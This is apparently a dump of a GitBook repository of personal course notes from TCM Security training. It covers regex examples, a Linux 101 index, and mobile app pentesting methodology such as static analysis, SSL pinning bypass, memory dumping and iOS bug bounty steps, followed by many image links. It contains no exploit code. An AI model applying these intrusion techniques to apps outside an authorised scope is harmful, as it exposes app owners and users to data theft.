"^4[2-9]|[5-9][1-9]|[1-9][1-9]{3,}$" numbers.txt 76 | 42 77 | 55 78 | 95 79 | ``` 80 | 81 | ![](.gitbook/assets/image-20221106135932189.png) 82 | 83 | ### [Dollar $ Search](https://regexr.com/66ogm) 84 | 85 | ```javascript 86 | ^\$?\s*[1-9][0-9]{0,2}(,?[0-9]{3})*(\.[0-9]{2})?$ 87 | 88 | /* 89 | \$ = ESCAPED CHAR - match a "$" character 90 | */ 91 | ``` 92 | 93 | ![](.gitbook/assets/image-20221106123519496.png) 94 | 95 | ## Replacing with RegEx 96 | 97 | - Replacing text with regular expressions varies between implementations. 98 | - Examples with the regexr site tool: 99 | 100 | ![](.gitbook/assets/image-20221106134143911.png) 101 | 102 | ![](.gitbook/assets/image-20221106134636112.png) 103 | 104 | ## Tips on Building RegEx 105 | 106 | - Regular expressions are very powerful but are not appropriate for every problem. 107 | - Regular expressions are greedy (**they'll match as much as they can**). 108 | - Add and **`?`** after **`*`** or **`+`** too make the match lazy (match the minimum possible) 109 | - **Don't write an entire regex all at once.** 110 | - Build a piece - test it - repeat 111 | - Use multiple, simpler, smaller expressions 112 | - Test with **valid** and **invalid** data - ensure the regex matches only what you want it to match. 113 | - Add comments using **`x`** modifier. 114 | 115 | ------ 116 | 117 | -------------------------------------------------------------------------------- /linux-101/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Linux 101 by Brent Eskridge - a practical hands-on course 3 | --- 4 | 5 | # **TCM - Linux 101** 6 | 7 | ![Linux 101 - academy.tcm-sec.com - © TCM Security](.gitbook/assets/linux101.png) 8 | 9 | ## [Linux101](https://academy.tcm-sec.com/p/linux-101) Course Goals and Objectives 10 | 11 | * Linux foundation and starting point for an average user without previous experience 12 | * Practical focus on Linux command line and its usage 13 | 14 | ## Course duration & Topics 15 | 16 | ~ 5:50 hours 17 | 18 | 1. [Introduction - Linux Distributions and Installation](1-linux-distributions/README.md) 19 | 2. [Command Line basics](2-command-line/README.md) 20 | 3. [Files and the Filesystem](3-filesystem/README.md) 21 | 4. [Users and Groups](4-users-groups/README.md) 22 | 5. [Installing Software](5-installing-sw/README.md) 23 | 6. [Shell basics](6-shells/README.md) 24 | 7. [Utilities and File Editors](7-utilities-editors/README.md) 25 | 8. [Process Management](8-process-manag/README.md) 26 | 9. [Regular Expressions](9-regex/README.md) 27 | 10. [Bash Scripting](10-scripting/README.md) 28 | 29 | ## Useful links and resources 30 | 31 | * Where to find the [Linux101 Course](https://academy.tcm-sec.com/p/linux-101)? - [TCM Academy Courses](https://academy.tcm-sec.com/courses) 32 | * Brent's GitHub repository - [TCM Linux101-Resources](https://github.com/beskridge/Linux101-Resources) 33 | * TCM discord channel - [TCM Security Discord](https://discord.gg/tcm) 34 | * [My references](linux101-references.md) 35 | 36 | -------------------------------------------------------------------------------- /lpe/README.md: -------------------------------------------------------------------------------- 1 | placeholder 2 | 3 | -------------------------------------------------------------------------------- /mapt/.gitbook/assets/mapt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/.gitbook/assets/mapt.png -------------------------------------------------------------------------------- /mapt/1-intro/.gitbook/assets/2023-12-24_10-00-26_279.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/1-intro/.gitbook/assets/2023-12-24_10-00-26_279.png -------------------------------------------------------------------------------- /mapt/1-intro/README.md: -------------------------------------------------------------------------------- 1 | # 1. Introduction & Mobile Pentesting 2 | 3 | ## Intro 4 | 5 | **The Penetration Testing Process** 6 | 7 | - Reconnaissance Active/Passive 8 | - Scanning/Enumeration 9 | - Exploitation 10 | - Privilege Escalation / Maintaining Access / Lateral, Vertical movement 11 | - Covering the tracks 12 | - Reporting 13 | 14 | **The Mobile Application Penetration Testing Process** 15 | 16 | - Reconnaissance 17 | - Static Analysis 18 | - Dynamic Analysis 19 | - Reporting 20 | 21 | ## Mobile Penetration Testing 22 | 23 | ### Reconnaissance 24 | 25 | - Info about the company Mobile Apps, releases, reports, code 26 | - Target app on the [Play Store](https://play.google.com/store) (Android) and [App Store](https://www.apple.com/app-store/) (iOS) for reviews, developers, versions, patches, company info, etc 27 | 28 | 29 | 30 | ### Static Analysis 31 | 32 | Read app's code manually and via automated tools. Look for: 33 | 34 | - security misconfigurations 35 | - hardcoded strings 36 | - user's information, email, username, passwords 37 | - URL - recon, enumerate, new exploitation path via API gateways 38 | - Cloud resources and storage buckets 39 | - Local Storage locations 40 | - etc 41 | 42 | ![academy.tcm-sec.com - © TCM Security](.gitbook/assets/2023-12-24_10-00-26_279.png) 43 | 44 | 45 | 46 | ### Dynamic Analysis 47 | 48 | Run the application and manipulate it by: 49 | 50 | - intercepting traffic with proxies 51 | - dump (RAM) memory and check for stored secrets 52 | - break **SSL Pinning** 53 | - check for runtime created files on local storage 54 | 55 | Check the [OWASP MASTG](https://mas.owasp.org/MASTG/) for various mobile security tests. Some attacks can result in OWASP Top Ten related attack vectors (SQL injection, XSS, IDOR) on the full website. 56 | 57 | 58 | 59 | ### Reporting 60 | 61 | Executive summary and detailed technical analysis of specific vulnerabilities, including criticality assessment, scoring, steps for reproduction, and mentions of positive security implementations. 62 | 63 | ------ 64 | 65 | -------------------------------------------------------------------------------- /mapt/10-ios-dynamic/.gitbook/assets/2024-02-25_02-08-07_429.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/10-ios-dynamic/.gitbook/assets/2024-02-25_02-08-07_429.png -------------------------------------------------------------------------------- /mapt/11-ios-bonus/README.md: -------------------------------------------------------------------------------- 1 | # 11. iOS Bug Bounty 2 | 3 | ## iOS Bug Bounty Hunt 4 | 5 | > ❗ Always refer to a HackerOne Bug Bounty program to find valid targets 6 | > 7 | > 🔗 [HackerOne iOS programs](https://hackerone.com/opportunities/all/search?asset_types=APPLE_STORE_APP_ID%2CTESTFLIGHT%2COTHER_IPA&ordering=Newest+programs) 8 | > 9 | > - 🧪 `e.g.` - [1.1.1.1 - com.cloudflare.1dot1dot1dot1](https://hackerone.com/cloudflare) Cloudflare iOS is in scope 10 | 11 | **Static Analysis** 12 | 13 | Install the app on the iPhone via the App Store 14 | 15 | Pull the `ipa` from the App Store via `AnyTrans` or `iMazing` tools (Apple ID login necessary) 16 | 17 | Import the `.ipa` into MobSF and analyze it 18 | 19 | Rename the `.ipa` file to `.zip`, unzip it and look at the content 20 | 21 | - `iTunesMetadata.plist` - general information, app name, etc 22 | - Open the `.app` and look for the application content 23 | - `Info.plist` - look for URLs, api keys, IDs, strings etc 24 | - `.plist`, `.json`, config files 25 | - `Manifest.plist` 26 | 27 | **Dynamic Analysis** 28 | 29 | Jailbreak the iPhone, run the app and try to intercept its traffic using a proxy (BurpSuite, Proxyman for MacOS, Zaproxy, etc) 30 | 31 | Proceed with SSL Unpinning using `Objection` if necessary 32 | 33 | Dynamically test the app by joining an account, signing in and navigating the entire app 34 | 35 | - Two accounts to test with are suggested, to test auth tokens, access to the other account, and different parts of the app 36 | 37 | ------ 38 | 39 | -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/1-pYeENzIsobLH6nfRCK9SA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/1-pYeENzIsobLH6nfRCK9SA.png -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/2024-01-05_12-54-58_283.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/2024-01-05_12-54-58_283.png -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/2024-01-05_12-55-28_284.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/2024-01-05_12-55-28_284.png -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/Android-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/Android-logo.png -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/android-software-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/android-software-stack.png -------------------------------------------------------------------------------- /mapt/2-android/.gitbook/assets/image-20240105151318551.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/2-android/.gitbook/assets/image-20240105151318551.png -------------------------------------------------------------------------------- /mapt/3-android-lab/.gitbook/assets/2024-01-05_15-35-46_285.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/3-android-lab/.gitbook/assets/2024-01-05_15-35-46_285.png -------------------------------------------------------------------------------- /mapt/3-android-lab/.gitbook/assets/2024-01-05_15-38-29_286.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/3-android-lab/.gitbook/assets/2024-01-05_15-38-29_286.png -------------------------------------------------------------------------------- /mapt/3-android-lab/.gitbook/assets/2024-01-05_15-45-03_287.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/3-android-lab/.gitbook/assets/2024-01-05_15-45-03_287.png -------------------------------------------------------------------------------- /mapt/3-android-lab/.gitbook/assets/2024-01-05_15-46-13_288.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/3-android-lab/.gitbook/assets/2024-01-05_15-46-13_288.png -------------------------------------------------------------------------------- /mapt/3-android-lab/.gitbook/assets/2024-01-05_16-38-30_289.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/3-android-lab/.gitbook/assets/2024-01-05_16-38-30_289.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-05_19-44-52_291.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-05_19-44-52_291.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-05_20-20-52_292.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-05_20-20-52_292.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-05_20-24-11_293.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-05_20-24-11_293.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_11-24-45_295.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_11-24-45_295.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_11-36-39_296.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_11-36-39_296.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_11-45-43_297.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_11-45-43_297.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-03-09_299.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-03-09_299.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-08-00_300.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-08-00_300.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-10-03_301.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-10-03_301.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-13-32_302.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-13-32_302.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-25-25_303.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-25-25_303.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_12-49-23_304.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_12-49-23_304.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_13-11-56_305.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_13-11-56_305.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_13-12-40_306.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_13-12-40_306.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_13-14-56_307.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_13-14-56_307.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_13-17-35_308.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_13-17-35_308.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-37-31_311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-37-31_311.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-38-13_312.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-38-13_312.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-38-34_313.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-38-34_313.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-39-52_314.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-39-52_314.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-40-58_315.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-40-58_315.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-41-44_316.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-41-44_316.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-42-41_317.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-42-41_317.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-47-50_318.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-47-50_318.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-49-11_319.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-49-11_319.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-50-11_320.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-50-11_320.png -------------------------------------------------------------------------------- /mapt/4-android-static/.gitbook/assets/2024-01-06_14-53-44_321.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/4-android-static/.gitbook/assets/2024-01-06_14-53-44_321.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-06_23-41-17_322.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-06_23-41-17_322.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-29-51_326.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-29-51_326.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-35-16_327.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-35-16_327.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-36-01_328.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-36-01_328.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-37-05_329.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-37-05_329.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-44-49_330.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-44-49_330.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-45-49_331.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-45-49_331.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-47-13_332.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-47-13_332.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-55-56_333.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-55-56_333.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-57-23_334.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_00-57-23_334.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-02-01_335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-02-01_335.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-13-11_337.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-13-11_337.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-30-15_338.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-30-15_338.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-32-52_339.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-32-52_339.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-36-41_340.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-36-41_340.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-43-18_342.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-43-18_342.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-45-17_343.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_01-45-17_343.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_03-12-28_345.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_03-12-28_345.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-08-37_347.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-08-37_347.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-25-53_348.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-25-53_348.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-33-12_349.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_09-33-12_349.png -------------------------------------------------------------------------------- /mapt/5-android-dynamic/.gitbook/assets/2024-01-07_10-16-09_350.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/5-android-dynamic/.gitbook/assets/2024-01-07_10-16-09_350.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-09_23-34-21_351.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-09_23-34-21_351.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-09_23-37-42_352.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-09_23-37-42_352.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-13-00_353.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-13-00_353.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-15-33_354.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-15-33_354.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-16-25_355.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-16-25_355.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-23-55_356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-23-55_356.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-26-33_357.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-26-33_357.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-27-23_358.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-27-23_358.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-30-43_359.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-30-43_359.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-32-39_360.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-32-39_360.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-35-15_361.png: -------------------------------------------------------------------------------- 